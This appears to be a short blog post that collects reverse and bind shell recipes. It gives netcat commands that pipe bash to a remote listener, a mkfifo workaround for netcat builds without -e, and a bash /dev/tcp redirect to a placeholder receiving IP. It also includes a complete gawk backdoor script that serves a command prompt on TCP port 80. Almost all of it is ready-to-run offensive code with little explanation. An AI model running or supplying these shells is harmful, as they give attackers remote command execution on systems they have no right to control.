On the shell receiving side:
nc -l 80
On the shell sending side:
nc <receiving machine ip> 80 -e <command e.g. bash>
If there is no -e option for your netcat:
unlink pipe; mkfifo pipe && nc <your ip> 80 <pipe | <command e.g. bash> &>pipe; unlink pipe
Weird effect is you can mirror the shell sending side output remotely, you need to control still from shell sending side and you wont see anything echoed only the shell receiving side will see it:
On the shell sending side:
bash -i >& /dev/tcp/<receiving machine ip>/80
Or if there is no netcat on the receiving side you can use gawk:
Source: http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387
gawk_rev_sh.awk:
#!/usr/bin/gawk -f
BEGIN {
Port = 80
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
After you can connect via
nc <receiving machine ip> 80
bkd>
Other good ideas about reverse shells here:
http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
No comments:
Post a Comment